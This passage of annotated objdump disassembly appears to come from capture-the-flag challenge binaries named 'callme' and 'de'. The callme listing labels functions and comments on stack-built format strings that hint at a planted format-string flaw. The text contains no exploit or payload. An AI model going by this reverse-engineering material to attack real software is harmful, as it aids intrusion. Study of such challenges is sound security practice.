0f b6 00 movzbl (%eax),%eax 307 | 804875c: 0f be c0 movsbl %al,%eax 308 | 804875f: 89 44 24 28 mov %eax,0x28(%esp) 309 | 8048763: 8d 54 24 2c lea 0x2c(%esp),%edx 310 | 8048767: 8b 44 24 24 mov 0x24(%esp),%eax 311 | 804876b: 01 d0 add %edx,%eax 312 | 804876d: 0f b6 00 movzbl (%eax),%eax 313 | 8048770: 8d 4c 24 2c lea 0x2c(%esp),%ecx 314 | 8048774: 8b 54 24 1c mov 0x1c(%esp),%edx 315 | 8048778: 01 ca add %ecx,%edx 316 | 804877a: 88 02 mov %al,(%edx) 317 | 804877c: 8b 44 24 28 mov 0x28(%esp),%eax 318 | 8048780: 8d 4c 24 2c lea 0x2c(%esp),%ecx 319 | 8048784: 8b 54 24 24 mov 0x24(%esp),%edx 320 | 8048788: 01 ca add %ecx,%edx 321 | 804878a: 88 02 mov %al,(%edx) 322 | 804878c: 83 44 24 1c 01 addl $0x1,0x1c(%esp) 323 | 8048791: 8b 44 24 1c mov 0x1c(%esp),%eax 324 | 8048795: 3b 44 24 20 cmp 0x20(%esp),%eax 325 | 8048799: 7c a1 jl 804873c 326 | 804879b: 8b 44 24 20 mov 0x20(%esp),%eax 327 | 804879f: 89 44 24 08 mov %eax,0x8(%esp) 328 | 80487a3: 8d 44 24 2c lea 0x2c(%esp),%eax 329 | 80487a7: 89 44 24 04 mov %eax,0x4(%esp) 330 | 80487ab: c7 04 24 01 00 00 00 movl $0x1,(%esp) 331 | 80487b2: e8 f9 fc ff ff call 80484b0 332 | 80487b7: b8 00 00 00 00 mov $0x0,%eax 333 | 80487bc: 8b 5c 24 7c mov 0x7c(%esp),%ebx 334 | 80487c0: 65 33 1d 14 00 00 00 xor %gs:0x14,%ebx 335 | 80487c7: 74 05 je 80487ce 336 | 80487c9: e8 92 fc ff ff call 8048460 <__stack_chk_fail@plt> 337 | 80487ce: 8b 5d fc mov -0x4(%ebp),%ebx 338 | 80487d1: c9 leave 339 | 80487d2: c3 ret 340 | 80487d3: 66 90 xchg %ax,%ax 341 | 80487d5: 66 90 xchg %ax,%ax 342 | 80487d7: 66 90 xchg %ax,%ax 343 | 80487d9: 66 90 xchg %ax,%ax 344 | 80487db: 66 90 xchg %ax,%ax 345 | 80487dd: 66 90 xchg %ax,%ax 346 | 80487df: 90 nop 347 | 348 | 080487e0 <__libc_csu_init>: 349 | 80487e0: 55 push %ebp 350 | 80487e1: 57 push %edi 351 | 80487e2: 31 ff xor %edi,%edi 352 | 80487e4: 56 push %esi 353 | 80487e5: 53 push %ebx 354 | 80487e6: e8 35 fd ff ff call 8048520 <__x86.get_pc_thunk.bx> 355 | 80487eb: 81 c3 15 18 00 00 add $0x1815,%ebx 356 | 80487f1: 83 ec 1c sub $0x1c,%esp 357 | 80487f4: 8b 6c 24 30 mov 0x30(%esp),%ebp 358 | 80487f8: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi 359 | 80487fe: e8 ed fb ff ff call 80483f0 <_init> 360 | 8048803: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax 361 | 8048809: 29 c6 sub %eax,%esi 362 | 804880b: c1 fe 02 sar $0x2,%esi 363 | 804880e: 85 f6 test %esi,%esi 364 | 8048810: 74 27 je 8048839 <__libc_csu_init+0x59> 365 | 8048812: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 366 | 8048818: 8b 44 24 38 mov 0x38(%esp),%eax 367 | 804881c: 89 2c 24 mov %ebp,(%esp) 368 | 804881f: 89 44 24 08 mov %eax,0x8(%esp) 369 | 8048823: 8b 44 24 34 mov 0x34(%esp),%eax 370 | 8048827: 89 44 24 04 mov %eax,0x4(%esp) 371 | 804882b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) 372 | 8048832: 83 c7 01 add $0x1,%edi 373 | 8048835: 39 f7 cmp %esi,%edi 374 | 8048837: 75 df jne 8048818 <__libc_csu_init+0x38> 375 | 8048839: 83 c4 1c add $0x1c,%esp 376 | 804883c: 5b pop %ebx 377 | 804883d: 5e pop %esi 378 | 804883e: 5f pop %edi 379 | 804883f: 5d pop %ebp 380 | 8048840: c3 ret 381 | 8048841: eb 0d jmp 8048850 <__libc_csu_fini> 382 | 8048843: 90 nop 383 | 8048844: 90 nop 384 | 8048845: 90 nop 385 | 8048846: 90 nop 386 | 8048847: 90 nop 387 | 8048848: 90 nop 388 | 8048849: 90 nop 389 | 804884a: 90 nop 390 | 804884b: 90 nop 391 | 804884c: 90 nop 392 | 804884d: 90 nop 393 | 804884e: 90 nop 394 | 804884f: 90 nop 395 | 396 | 08048850 <__libc_csu_fini>: 397 | 8048850: f3 c3 repz ret 398 | 399 | Disassembly of section .fini: 400 | 401 | 08048854 <_fini>: 402 | 8048854: 53 push %ebx 403 | 8048855: 83 ec 08 sub $0x8,%esp 404 | 8048858: e8 c3 fc ff ff call 8048520 <__x86.get_pc_thunk.bx> 405 | 804885d: 81 c3 a3 17 00 00 add $0x17a3,%ebx 406 | 8048863: 83 c4 08 add $0x8,%esp 407 | 8048866: 5b pop %ebx 408 | 8048867: c3 ret 409 | -------------------------------------------------------------------------------- /callme.txt: -------------------------------------------------------------------------------- 1 | 2 | callme-69d26b77eb41e4eeba1d7b8402a8b165: file format elf32-i386 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0804839c <.init>: 8 | 804839c: 53 push %ebx 9 | 804839d: 83 ec 08 sub $0x8,%esp 10 | 80483a0: e8 eb 00 00 00 call 8048490 11 | 80483a5: 81 c3 5b 1c 00 00 add $0x1c5b,%ebx 12 | 80483ab: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 13 | 80483b1: 85 c0 test %eax,%eax 14 | 80483b3: 74 05 je 80483ba 15 | 80483b5: e8 56 00 00 00 call 8048410 <__gmon_start__@plt> 16 | 80483ba: 83 c4 08 add $0x8,%esp 17 | 80483bd: 5b pop %ebx 18 | 80483be: c3 ret 19 | 20 | Disassembly of section .plt: 21 | 22 | 080483c0 : 23 | 80483c0: ff 35 04 a0 04 08 pushl 0x804a004 24 | 80483c6: ff 25 08 a0 04 08 jmp *0x804a008 25 | 80483cc: 00 00 add %al,(%eax) 26 | ... 27 | 28 | 080483d0 : 29 | 80483d0: ff 25 0c a0 04 08 jmp *0x804a00c 30 | 80483d6: 68 00 00 00 00 push $0x0 31 | 80483db: e9 e0 ff ff ff jmp 80483c0 32 | 33 | 080483e0 : 34 | 80483e0: ff 25 10 a0 04 08 jmp *0x804a010 35 | 80483e6: 68 08 00 00 00 push $0x8 36 | 80483eb: e9 d0 ff ff ff jmp 80483c0 37 | 38 | 080483f0 : 39 | 80483f0: ff 25 14 a0 04 08 jmp *0x804a014 40 | 80483f6: 68 10 00 00 00 push $0x10 41 | 80483fb: e9 c0 ff ff ff jmp 80483c0 42 | 43 | 08048400 <__stack_chk_fail@plt>: 44 | 8048400: ff 25 18 a0 04 08 jmp *0x804a018 45 | 8048406: 68 18 00 00 00 push $0x18 46 | 804840b: e9 b0 ff ff ff jmp 80483c0 47 | 48 | 08048410 <__gmon_start__@plt>: 49 | 8048410: ff 25 1c a0 04 08 jmp *0x804a01c 50 | 8048416: 68 20 00 00 00 push $0x20 51 | 804841b: e9 a0 ff ff ff jmp 80483c0 52 | 53 | 08048420 : 54 | 8048420: ff 25 20 a0 04 08 jmp *0x804a020 55 | 8048426: 68 28 00 00 00 push $0x28 56 | 804842b: e9 90 ff ff ff jmp 80483c0 57 | 58 | 08048430 : 59 | 8048430: ff 25 24 a0 04 08 jmp *0x804a024 60 | 8048436: 68 30 00 00 00 push $0x30 61 | 804843b: e9 80 ff ff ff jmp 80483c0 62 | 63 | 08048440 <__libc_start_main@plt>: 64 | 8048440: ff 25 28 a0 04 08 jmp *0x804a028 65 | 8048446: 68 38 00 00 00 push $0x38 66 | 804844b: e9 70 ff ff ff jmp 80483c0 67 | 68 | 08048450 : 69 | 8048450: ff 25 2c a0 04 08 jmp *0x804a02c 70 | 8048456: 68 40 00 00 00 push $0x40 71 | 804845b: e9 60 ff ff ff jmp 80483c0 72 | 73 | Disassembly of section .text: 74 | 75 | 08048460 <.text>: 76 | _start 77 | 8048460: 31 ed xor %ebp,%ebp 78 | 8048462: 5e pop %esi 79 | 8048463: 89 e1 mov %esp,%ecx 80 | 8048465: 83 e4 f0 and $0xfffffff0,%esp 81 | 8048468: 50 push %eax 82 | 8048469: 54 push %esp 83 | 804846a: 52 push %edx 84 | 804846b: 68 80 88 04 08 push $0x8048880 85 | 8048470: 68 10 88 04 08 push $0x8048810 86 | 8048475: 51 push %ecx 87 | 8048476: 56 push %esi 88 | 8048477: 68 00 87 04 08 push $0x8048700 89 | 804847c: e8 bf ff ff ff call 8048440 <__libc_start_main@plt> 90 | 8048481: f4 hlt 91 | 8048482: 66 90 xchg %ax,%ax 92 | 8048484: 66 90 xchg %ax,%ax 93 | 8048486: 66 90 xchg %ax,%ax 94 | 8048488: 66 90 xchg %ax,%ax 95 | 804848a: 66 90 xchg %ax,%ax 96 | 804848c: 66 90 xchg %ax,%ax 97 | 804848e: 66 90 xchg %ax,%ax 98 | 99 | thunk.bx 100 | 8048490: 8b 1c 24 mov (%esp),%ebx 101 | 8048493: c3 ret 102 | 8048494: 66 90 xchg %ax,%ax 103 | 8048496: 66 90 xchg %ax,%ax 104 | 8048498: 66 90 xchg %ax,%ax 105 | 804849a: 66 90 xchg %ax,%ax 106 | 804849c: 66 90 xchg %ax,%ax 107 | 804849e: 66 90 xchg %ax,%ax 108 | 109 | deregister_tm_clones 110 | 80484a0: b8 3b a0 04 08 mov $0x804a03b,%eax 111 | 80484a5: 2d 38 a0 04 08 sub $0x804a038,%eax 112 | 80484aa: 83 f8 06 cmp $0x6,%eax 113 | 80484ad: 77 01 ja 80484b0 114 | 80484af: c3 ret 115 | 80484b0: b8 00 00 00 00 mov $0x0,%eax 116 | 80484b5: 85 c0 test %eax,%eax 117 | 80484b7: 74 f6 je 80484af 118 | 80484b9: 55 push %ebp 119 | 80484ba: 89 e5 mov %esp,%ebp 120 | 80484bc: 83 ec 18 sub $0x18,%esp 121 | 80484bf: c7 04 24 38 a0 04 08 movl $0x804a038,(%esp) 122 | 80484c6: ff d0 call *%eax 123 | 80484c8: c9 leave 124 | 80484c9: c3 ret 125 | 80484ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 126 | 127 | register_tm_clones 128 | 80484d0: b8 38 a0 04 08 mov $0x804a038,%eax 129 | 80484d5: 2d 38 a0 04 08 sub $0x804a038,%eax 130 | 80484da: c1 f8 02 sar $0x2,%eax 131 | 80484dd: 89 c2 mov %eax,%edx 132 | 80484df: c1 ea 1f shr $0x1f,%edx 133 | 80484e2: 01 d0 add %edx,%eax 134 | 80484e4: d1 f8 sar %eax 135 | 80484e6: 75 01 jne 80484e9 136 | 80484e8: c3 ret 137 | 80484e9: ba 00 00 00 00 mov $0x0,%edx 138 | 80484ee: 85 d2 test %edx,%edx 139 | 80484f0: 74 f6 je 80484e8 140 | 80484f2: 55 push %ebp 141 | 80484f3: 89 e5 mov %esp,%ebp 142 | 80484f5: 83 ec 18 sub $0x18,%esp 143 | 80484f8: 89 44 24 04 mov %eax,0x4(%esp) 144 | 80484fc: c7 04 24 38 a0 04 08 movl $0x804a038,(%esp) 145 | 8048503: ff d2 call *%edx 146 | 8048505: c9 leave 147 | 8048506: c3 ret 148 | 8048507: 89 f6 mov %esi,%esi 149 | 8048509: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 150 | 151 | __do_global_dtors_aux 152 | 8048510: 80 3d 40 a0 04 08 00 cmpb $0x0,0x804a040 153 | 8048517: 75 13 jne 804852c 154 | 8048519: 55 push %ebp 155 | 804851a: 89 e5 mov %esp,%ebp 156 | 804851c: 83 ec 08 sub $0x8,%esp 157 | 804851f: e8 7c ff ff ff call 80484a0 158 | 8048524: c6 05 40 a0 04 08 01 movb $0x1,0x804a040 159 | 804852b: c9 leave 160 | 804852c: f3 c3 repz ret 161 | 804852e: 66 90 xchg %ax,%ax 162 | 163 | frame_dummy: 164 | 8048530: a1 10 9f 04 08 mov 0x8049f10,%eax 165 | 8048535: 85 c0 test %eax,%eax 166 | 8048537: 74 1f je 8048558 167 | 8048539: b8 00 00 00 00 mov $0x0,%eax 168 | 804853e: 85 c0 test %eax,%eax 169 | 8048540: 74 16 je 8048558 170 | 8048542: 55 push %ebp 171 | 8048543: 89 e5 mov %esp,%ebp 172 | 8048545: 83 ec 18 sub $0x18,%esp 173 | 8048548: c7 04 24 10 9f 04 08 movl $0x8049f10,(%esp) 174 | 804854f: ff d0 call *%eax 175 | 8048551: c9 leave 176 | 8048552: e9 79 ff ff ff jmp 80484d0 177 | 8048557: 90 nop 178 | 8048558: e9 73 ff ff ff jmp 80484d0 179 | 180 | show_msg(const char* time_str, const char* fmt): 181 | 804855d: 55 push %ebp 182 | 804855e: 89 e5 mov %esp,%ebp 183 | 8048560: 81 ec b8 00 00 00 sub $0xb8,%esp 184 | 8048566: 8b 45 08 mov 0x8(%ebp),%eax 185 | 8048569: 89 85 64 ff ff ff mov %eax,-0x9c(%ebp) 186 | 804856f: 8b 45 0c mov 0xc(%ebp),%eax 187 | 8048572: 89 85 60 ff ff ff mov %eax,-0xa0(%ebp) 188 | 8048578: 65 a1 14 00 00 00 mov %gs:0x14,%eax 189 | 804857e: 89 45 f4 mov %eax,-0xc(%ebp) 190 | 8048581: 31 c0 xor %eax,%eax 191 | 8048583: c7 44 24 0c 60 a0 04 movl $0x804a060,0xc(%esp) 192 | 804858a: 08 193 | 804858b: 8b 85 64 ff ff ff mov -0x9c(%ebp),%eax 194 | 8048591: 89 44 24 08 mov %eax,0x8(%esp) 195 | 8048595: 8b 85 60 ff ff ff mov -0xa0(%ebp),%eax 196 | 804859b: 89 44 24 04 mov %eax,0x4(%esp) 197 | 804859f: 8d 85 74 ff ff ff lea -0x8c(%ebp),%eax 198 | 80485a5: 89 04 24 mov %eax,(%esp) 199 | 80485a8: e8 a3 fe ff ff call 8048450 200 | 80485ad: 8d 85 74 ff ff ff lea -0x8c(%ebp),%eax 201 | 80485b3: 89 04 24 mov %eax,(%esp) 202 | 80485b6: e8 29 02 00 00 call 80487e4 203 | 80485bb: 8b 45 f4 mov -0xc(%ebp),%eax 204 | 80485be: 65 33 05 14 00 00 00 xor %gs:0x14,%eax 205 | 80485c5: 74 05 je 80485cc 206 | 80485c7: e8 34 fe ff ff call 8048400 <__stack_chk_fail@plt> 207 | 80485cc: c9 leave 208 | 80485cd: c3 ret 209 | 210 | show(): 211 | 80485ce: 55 push %ebp 212 | 80485cf: 89 e5 mov %esp,%ebp 213 | 80485d1: 81 ec 98 00 00 00 sub $0x98,%esp 214 | 80485d7: 65 a1 14 00 00 00 mov %gs:0x14,%eax 215 | 80485dd: 89 45 f4 mov %eax,-0xc(%ebp) 216 | 80485e0: 31 c0 xor %eax,%eax 217 | 80485e2: c7 45 84 20 20 20 20 movl $0x20202020,-0x7c(%ebp) 218 | 80485e9: c7 45 88 20 20 20 20 movl $0x20202020,-0x78(%ebp) 219 | 80485f0: c7 45 8c 20 25 32 24 movl $0x24322520,-0x74(%ebp) ; ' %2$' 220 | 80485f7: c7 45 90 73 0a 00 00 movl $0xa73,-0x70(%ebp) 221 | 80485fe: c7 45 94 25 73 25 73 movl $0x73257325,-0x6c(%ebp) 222 | 8048605: c7 45 98 0a 00 00 00 movl $0xa,-0x68(%ebp) 223 | 804860c: c7 45 9c 00 00 00 00 movl $0x0,-0x64(%ebp) 224 | 8048613: c7 45 a0 00 00 00 00 movl $0x0,-0x60(%ebp) 225 | 804861a: 8d 85 7c ff ff ff lea -0x84(%ebp),%eax ; time_t* 226 | 8048620: 89 04 24 mov %eax,(%esp) 227 | 8048623: e8 a8 fd ff ff call 80483d0 228 | 8048628: 8d 85 7c ff ff ff lea -0x84(%ebp),%eax ; time_t* 229 | 804862e: 89 04 24 mov %eax,(%esp) 230 | 8048631: e8 fa fd ff ff call 8048430 231 | 8048636: 89 45 80 mov %eax,-0x80(%ebp) ; struct tm 232 | 8048639: 8b 45 80 mov -0x80(%ebp),%eax 233 | 804863c: 89 44 24 0c mov %eax,0xc(%esp) ; 4th (tm) 234 | 8048640: c7 44 24 08 a0 88 04 movl $0x80488a0,0x8(%esp) ; 3rd (fmt) 235 | 8048647: 08 236 | 8048648: c7 44 24 04 50 00 00 movl $0x50,0x4(%esp) ; 2nd (max) 237 | 804864f: 00 238 | 8048650: 8d 45 a4 lea -0x5c(%ebp),%eax 239 | 8048653: 89 04 24 mov %eax,(%esp) ; 1st (out) 240 | 8048656: e8 c5 fd ff ff call 8048420 241 | 804865b: 8b 95 7c ff ff ff mov -0x84(%ebp),%edx 242 | 8048661: a1 44 a0 04 08 mov 0x804a044,%eax ; prev 243 | 8048666: 39 c2 cmp %eax,%edx 244 | 8048668: 74 22 je 804868c 245 | 246 | 804866a: 8b 85 7c ff ff ff mov -0x84(%ebp),%eax 247 | 8048670: a3 44 a0 04 08 mov %eax,0x804a044 248 | 8048675: 8d 45 84 lea -0x7c(%ebp),%eax ; "%s%s\n" 249 | 8048678: 83 c0 10 add $0x10,%eax 250 | 804867b: 89 44 24 04 mov %eax,0x4(%esp) 251 | 804867f: 8d 45 a4 lea -0x5c(%ebp),%eax 252 | 8048682: 89 04 24 mov %eax,(%esp) 253 | 8048685: e8 d3 fe ff ff call 804855d 254 | 804868a: eb 12 jmp 804869e 255 | same_time: 256 | 804868c: 8d 45 84 lea -0x7c(%ebp),%eax ; " %2$s\n" 257 | 804868f: 89 44 24 04 mov %eax,0x4(%esp) 258 | 8048693: 8d 45 a4 lea -0x5c(%ebp),%eax 259 | 8048696: 89 04 24 mov %eax,(%esp) 260 | 8048699: e8 bf fe ff ff call 804855d 261 | done: 262 | 804869e: 8b 45 f4 mov -0xc(%ebp),%eax 263 | 80486a1: 65 33 05 14 00 00 00 xor %gs:0x14,%eax 264 | 80486a8: 74 05 je 80486af 265 | 80486aa: e8 51 fd ff ff call 8048400 <__stack_chk_fail@plt> 266 | 80486af: c9 leave 267 | 80486b0: c3 ret 268 | 269 | 270 | record_msg(): 271 | 80486b1: 55 push %ebp 272 | 80486b2: 89 e5 mov %esp,%ebp 273 | 80486b4: 83 ec 18 sub $0x18,%esp 274 | 275 | loop: 276 | 80486b7: c7 44 24 04 00 04 00 movl $0x400,0x4(%esp) 277 | 80486be: 00 278 | 80486bf: c7 04 24 60 a0 04 08 movl $0x804a060,(%esp) 279 | 80486c6: e8 e5 00 00 00 call 80487b0 280 | 281 | 80486cb: 0f b6 05 60 a0 04 08 movzbl 0x804a060,%eax 282 | 80486d2: 3c 45 cmp $0x45,%al 283 | 80486d4: 75 21 jne 80486f7 284 | 80486d6: 0f b6 05 61 a0 04 08 movzbl 0x804a061,%eax 285 | 80486dd: 3c 4e cmp $0x4e,%al 286 | 80486df: 75 16 jne 80486f7 287 | 80486e1: 0f b6 05 62 a0 04 08 movzbl 0x804a062,%eax 288 | 80486e8: 3c 44 cmp $0x44,%al 289 | 80486ea: 75 0b jne 80486f7 290 | 80486ec: 0f b6 05 63 a0 04 08 movzbl 0x804a063,%eax 291 | 80486f3: 84 c0 test %al,%al 292 | 80486f5: 74 07 je 80486fe 293 | 294 | record: 295 | 80486f7: e8 d2 fe ff ff call 80485ce 296 | 80486fc: eb b9 jmp 80486b7 297 | 298 | done: 299 | 80486fe: c9 leave 300 | 80486ff: c3 ret 301 | 302 | main(): 303 | 8048700: 55 push %ebp 304 | 8048701: 89 e5 mov %esp,%ebp 305 | 8048703: 83 e4 f0 and $0xfffffff0,%esp 306 | 8048706: 83 ec 20 sub $0x20,%esp 307 | 8048709: 65 a1 14 00 00 00 mov %gs:0x14,%eax 308 | 804870f: 89 44 24 1c mov %eax,0x1c(%esp) 309 | 8048713: 31 c0 xor %eax,%eax 310 | 8048715: c7 04 24 1e 00 00 00 movl $0x1e,(%esp) 311 | 804871c: e8 cf fc ff ff call 80483f0 312 | 8048721: c7 44 24 14 00 00 00 movl $0x0,0x14(%esp) 313 | 8048728: 00 314 | 315 | sleep_loop: 316 | 8048729: eb 1d jmp 8048748 317 | 804872b: c7 04 24 aa 88 04 08 movl $0x80488aa,(%esp) 318 | 8048732: e8 ad 00 00 00 call 80487e4 319 | 8048737: c7 04 24 01 00 00 00 movl $0x1,(%esp) 320 | 804873e: e8 9d fc ff ff call 80483e0 321 | 8048743: 83 44 24 14 01 addl $0x1,0x14(%esp) 322 | 8048748: 83 7c 24 14 02 cmpl $0x2,0x14(%esp) 323 | 804874d: 7e dc jle 804872b 324 | 325 | 804874f: c7 04 24 ac 88 04 08 movl $0x80488ac,(%esp) 326 | 8048756: e8 89 00 00 00 call 80487e4 ; Sorry 327 | 804875b: c7 04 24 e4 88 04 08 movl $0x80488e4,(%esp) 328 | 8048762: e8 7d 00 00 00 call 80487e4 ; Msg? 329 | 330 | 8048767: c7 44 24 04 04 00 00 movl $0x4,0x4(%esp) 331 | 804876e: 00 332 | 804876f: 8d 44 24 18 lea 0x18(%esp),%eax 333 | 8048773: 89 04 24 mov %eax,(%esp) 334 | 8048776: e8 35 00 00 00 call 80487b0 335 | 336 | 804877b: 0f b6 44 24 18 movzbl 0x18(%esp),%eax 337 | 8048780: 3c 79 cmp $0x79,%al 338 | 8048782: 75 07 jne 804878b 339 | 8048784: e8 28 ff ff ff call 80486b1 340 | 8048789: eb 0c jmp 8048797 341 | 342 | 804878b: c7 04 24 0b 89 04 08 movl $0x804890b,(%esp) 343 | 8048792: e8 4d 00 00 00 call 80487e4 ; Bye 344 | 8048797: 8b 54 24 1c mov 0x1c(%esp),%edx 345 | 804879b: 65 33 15 14 00 00 00 xor %gs:0x14,%edx 346 | 80487a2: 74 05 je 80487a9 347 | 80487a4: e8 57 fc ff ff call 8048400 <__stack_chk_fail@plt> 348 | 80487a9: c9 leave 349 | 80487aa: c3 ret 350 | 351 | 80487ab: 66 90 xchg %ax,%ax 352 | 80487ad: 66 90 xchg %ax,%ax 353 | 80487af: 90 nop 354 | 355 | readline(): 356 | 80487b0: 53 push %ebx 357 | 80487b1: 51 push %ecx 358 | 80487b2: 52 push %edx 359 | 80487b3: 56 push %esi 360 | 80487b4: bb 00 00 00 00 mov $0x0,%ebx 361 | 80487b9: 8b 4c 24 14 mov 0x14(%esp),%ecx 362 | 80487bd: ba 01 00 00 00 mov $0x1,%edx 363 | 80487c2: 8b 74 24 18 mov 0x18(%esp),%esi 364 | loop: 365 | 80487c6: 83 ee 01 sub $0x1,%esi 366 | 80487c9: 74 11 je 80487dc 367 | 80487cb: b8 03 00 00 00 mov $0x3,%eax 368 | 80487d0: cd 80 int $0x80 369 | 80487d2: 80 39 0a cmpb $0xa,(%ecx) 370 | 80487d5: 74 05 je 80487dc 371 | 80487d7: 83 c1 01 add $0x1,%ecx 372 | 80487da: eb ea jmp 80487c6 373 | done: 374 | 80487dc: c6 01 00 movb $0x0,(%ecx) 375 | 80487df: 5e pop %esi 376 | 80487e0: 5a pop %edx 377 | 80487e1: 59 pop %ecx 378 | 80487e2: 5b pop %ebx 379 | 80487e3: c3 ret 380 | 381 | print(): 382 | 80487e4: 53 push %ebx 383 | 80487e5: 51 push %ecx 384 | 80487e6: 52 push %edx 385 | 80487e7: bb 01 00 00 00 mov $0x1,%ebx 386 | 80487ec: 8b 4c 24 10 mov 0x10(%esp),%ecx 387 | 80487f0: ba 01 00 00 00 mov $0x1,%edx 388 | loop: 389 | 80487f5: 80 39 00 cmpb $0x0,(%ecx) 390 | 80487f8: 74 0c je 8048806 391 | 80487fa: b8 04 00 00 00 mov $0x4,%eax 392 | 80487ff: cd 80 int $0x80 393 | 8048801: 83 c1 01 add $0x1,%ecx 394 | 8048804: eb ef jmp 80487f5 395 | 396 | done: 397 | 8048806: 5a pop %edx 398 | 8048807: 59 pop %ecx 399 | 8048808: 5b pop %ebx 400 | 8048809: c3 ret 401 | 402 | __libc_csu_init: 403 | 804880a: 66 90 xchg %ax,%ax 404 | 804880c: 66 90 xchg %ax,%ax 405 | 804880e: 66 90 xchg %ax,%ax 406 | 8048810: 55 push %ebp 407 | 8048811: 57 push %edi 408 | 8048812: 31 ff xor %edi,%edi 409 | 8048814: 56 push %esi 410 | 8048815: 53 push %ebx 411 | 8048816: e8 75 fc ff ff call 8048490 412 | 804881b: 81 c3 e5 17 00 00 add $0x17e5,%ebx 413 | 8048821: 83 ec 1c sub $0x1c,%esp 414 | 8048824: 8b 6c 24 30 mov 0x30(%esp),%ebp 415 | 8048828: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi 416 | 804882e: e8 69 fb ff ff call 804839c 417 | 8048833: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax 418 | 8048839: 29 c6 sub %eax,%esi 419 | 804883b: c1 fe 02 sar $0x2,%esi 420 | 804883e: 85 f6 test %esi,%esi 421 | 8048840: 74 27 je 8048869 422 | 8048842: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 423 | 8048848: 8b 44 24 38 mov 0x38(%esp),%eax 424 | 804884c: 89 2c 24 mov %ebp,(%esp) 425 | 804884f: 89 44 24 08 mov %eax,0x8(%esp) 426 | 8048853: 8b 44 24 34 mov 0x34(%esp),%eax 427 | 8048857: 89 44 24 04 mov %eax,0x4(%esp) 428 | 804885b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) 429 | 8048862: 83 c7 01 add $0x1,%edi 430 | 8048865: 39 f7 cmp %esi,%edi 431 | 8048867: 75 df jne 8048848 432 | 8048869: 83 c4 1c add $0x1c,%esp 433 | 804886c: 5b pop %ebx 434 | 804886d: 5e pop %esi 435 | 804886e: 5f pop %edi 436 | 804886f: 5d pop %ebp 437 | 8048870: c3 ret 438 | 8048871: eb 0d jmp 8048880 439 | 8048873: 90 nop 440 | 8048874: 90 nop 441 | 8048875: 90 nop 442 | 8048876: 90 nop 443 | 8048877: 90 nop 444 | 8048878: 90 nop 445 | 8048879: 90 nop 446 | 804887a: 90 nop 447 | 804887b: 90 nop 448 | 804887c: 90 nop 449 | 804887d: 90 nop 450 | 804887e: 90 nop 451 | 804887f: 90 nop 452 | 8048880: f3 c3 repz ret 453 | 454 | Disassembly of section .fini: 455 | 456 | 08048884 <.fini>: 457 | 8048884: 53 push %ebx 458 | 8048885: 83 ec 08 sub $0x8,%esp 459 | 8048888: e8 03 fc ff ff call 8048490 460 | 804888d: 81 c3 73 17 00 00 add $0x1773,%ebx 461 | 8048893: 83 c4 08 add $0x8,%esp 462 | 8048896: 5b pop %ebx 463 | 8048897: c3 ret 464 | -------------------------------------------------------------------------------- /de.txt: -------------------------------------------------------------------------------- 1 | 2 | 62b6b6a8a19a89a3c33801520e0e8b58-de: file format elf64-x86-64 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0000000000400cf8 <.init>: 8 | 400cf8: 48 83 ec 08 sub $0x8,%rsp 9 | 400cfc: 48 8b 05 f5 22 20 00 mov 0x2022f5(%rip),%rax # 602ff8 10 | 400d03: 48 85 c0 test %rax,%rax 11 | 400d06: 74 05 je 400d0d 12 | 400d08: e8 53 00 00 00 callq 400d60 <__gmon_start__@plt> 13 | 400d0d: 48 83 c4 08 add $0x8,%rsp 14 | 400d11: c3 retq 15 | 16 | Disassembly of section .plt: 17 | 18 | 0000000000400d20 : 19 | 400d20: ff 35 e2 22 20 00 pushq 0x2022e2(%rip) # 603008 20 | 400d26: ff 25 e4 22 20 00 jmpq *0x2022e4(%rip) # 603010 21 | 400d2c: 0f 1f 40 00 nopl 0x0(%rax) 22 | 23 | 0000000000400d30 : 24 | 400d30: ff 25 e2 22 20 00 jmpq *0x2022e2(%rip) # 603018 25 | 400d36: 68 00 00 00 00 pushq $0x0 26 | 400d3b: e9 e0 ff ff ff jmpq 400d20 27 | 28 | 0000000000400d40 : 29 | 400d40: ff 25 da 22 20 00 jmpq *0x2022da(%rip) # 603020 30 | 400d46: 68 01 00 00 00 pushq $0x1 31 | 400d4b: e9 d0 ff ff ff jmpq 400d20 32 | 33 | 0000000000400d50 : 34 | 400d50: ff 25 d2 22 20 00 jmpq *0x2022d2(%rip) # 603028 35 | 400d56: 68 02 00 00 00 pushq $0x2 36 | 400d5b: e9 c0 ff ff ff jmpq 400d20 37 | 38 | 0000000000400d60 <__gmon_start__@plt>: 39 | 400d60: ff 25 ca 22 20 00 jmpq *0x2022ca(%rip) # 603030 40 | 400d66: 68 03 00 00 00 pushq $0x3 41 | 400d6b: e9 b0 ff ff ff jmpq 400d20 42 | 43 | 0000000000400d70 : 44 | 400d70: ff 25 c2 22 20 00 jmpq *0x2022c2(%rip) # 603038 45 | 400d76: 68 04 00 00 00 pushq $0x4 46 | 400d7b: e9 a0 ff ff ff jmpq 400d20 47 | 48 | 0000000000400d80 : 49 | 400d80: ff 25 ba 22 20 00 jmpq *0x2022ba(%rip) # 603040 50 | 400d86: 68 05 00 00 00 pushq $0x5 51 | 400d8b: e9 90 ff ff ff jmpq 400d20 52 | 53 | 0000000000400d90 : 54 | 400d90: ff 25 b2 22 20 00 jmpq *0x2022b2(%rip) # 603048 55 | 400d96: 68 06 00 00 00 pushq $0x6 56 | 400d9b: e9 80 ff ff ff jmpq 400d20 57 | 58 | 0000000000400da0 : 59 | 400da0: ff 25 aa 22 20 00 jmpq *0x2022aa(%rip) # 603050 60 | 400da6: 68 07 00 00 00 pushq $0x7 61 | 400dab: e9 70 ff ff ff jmpq 400d20 62 | 63 | 0000000000400db0 : 64 | 400db0: ff 25 a2 22 20 00 jmpq *0x2022a2(%rip) # 603058 65 | 400db6: 68 08 00 00 00 pushq $0x8 66 | 400dbb: e9 60 ff ff ff jmpq 400d20 67 | 68 | 0000000000400dc0 : 69 | 